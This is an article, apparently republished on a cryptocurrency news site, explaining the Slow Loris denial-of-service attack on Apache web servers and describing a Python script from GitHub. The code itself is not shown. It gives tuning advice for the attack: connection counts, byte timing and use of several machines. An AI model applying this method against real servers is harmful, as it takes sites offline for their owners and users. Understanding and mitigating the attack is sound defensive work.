Usually, hackers use a lot of computers (or toasters) to take down a server by overwhelming it with traffic. However, the same goal can sometimes be achieved with a single computer. In this article, I’m going to analyze my favorite denial of service attack known as Slow Loris attack and python code implementation from github. I found and tested 2 python Slow Loris scripts from the same author – advanced one which is ready for randomizing User Agent headers, proxies, SSL and other good stuff. However, this code is more appropriate to illustrate the idea behind the attack, and works just as well. It can be run on any operating system that supports python.
This article is for academic and entertainment purposes only. Please don’t use it maliciously.
Theory
In a clients-server HTTP connection, end of a HTTP packet is marked with 2 consecutive newline characters ([CRLF]). If those 2 characters never come, sending/receiving of the HTTP packet is not going to end. The idea in Slow Loris attack is to open as many concurrent HTTP requests and keep them alive infinitely (with minimum resources) to deplete the resources in the application layer on the server because it has to wait for every connection.
While most servers such as Apache make use of a timeout to terminate incomplete HTTP requests – the timeout is set to 300 seconds by default and is re-set as soon as the client sends additional data. That’s why the attacker does send some data, but painfully slowly – hence the name.
Slow Loris achieves DoS by starting many concurrent HTTP connections and sending a byte of data every 15 seconds. Of course, timing should be adjusted in relation to timeout on a specific server, but it’s often effective even with 15 seconds timeout. Because attacker’s computer sends only few bytes per 15 seconds per connection, some servers can go down while the attacker uses his internet as if nothing’s going on.
Affected Servers
This attack mostly affects apache webservers because of the fact that apache starts a new thread for each connection. That is the key factor that makes the difference of attack succeeding or not. Unless of course, someone implemented a mitigation for this type of attack.
Today, about 50% of websites are hosted on apache servers. Along with some other servers, it makes it a very useful attack for a hacker to include in his arsenal.
Also, apache webservers can easily be found with Google’s search functionalities, e.g.
Python Implementation
Program gets the target server IP or DNS name as a command line argument. Here’s how it should look like (I set socket_count to 5 to avoid any trouble):
First, it opens a number of HTTP connections equal to socket_count (integer from 20th line) . Then, it starts an infinite while loop that keeps those connections alive by sending a random number (1 to 5000) each 15 seconds (specified in 58th line), resetting the timeout period.
Conclusion
I highly recommend testing your websites because it’s so easy. If it works, it’s going to take a few minutes to cause a DoS. If it doesn’t, try increasing the socket_count as much as your PC can handle. Also, don’t forget to optimize the timeout period. Depending on attacker’s bandwitdth, it may take more than 1 computer to take down some vulnerable sites.
Hopefully, this attack will get more attention and more people will start protecting their servers. Luckily, there are many tutorials that make securing against this type of attack pretty straightforward.
TheBitcoinNews.com – Bitcoin News source since June 2011 –
Virtual currency is not legal tender, is not backed by the government, and accounts and value balances are not subject to consumer protections. TheBitcoinNews.com holds several Cryptocurrencies, and this information does NOT constitute investment advice or an offer to invest.
Everything on this website can be seen as Advertisment and most comes from Press Releases, TheBitcoinNews.com is is not responsible for any of the content of or from external sites and feeds. Sponsored posts are always flagged as this, guest posts, guest articles and PRs are most time but NOT always flagged as this. Expert opinions and Price predictions are not supported by us and comes up from 3th part websites.
Advertise with us : Advertise
Our Social Networks: Facebook Instagram Pinterest Reddit Telegram Twitter Youtube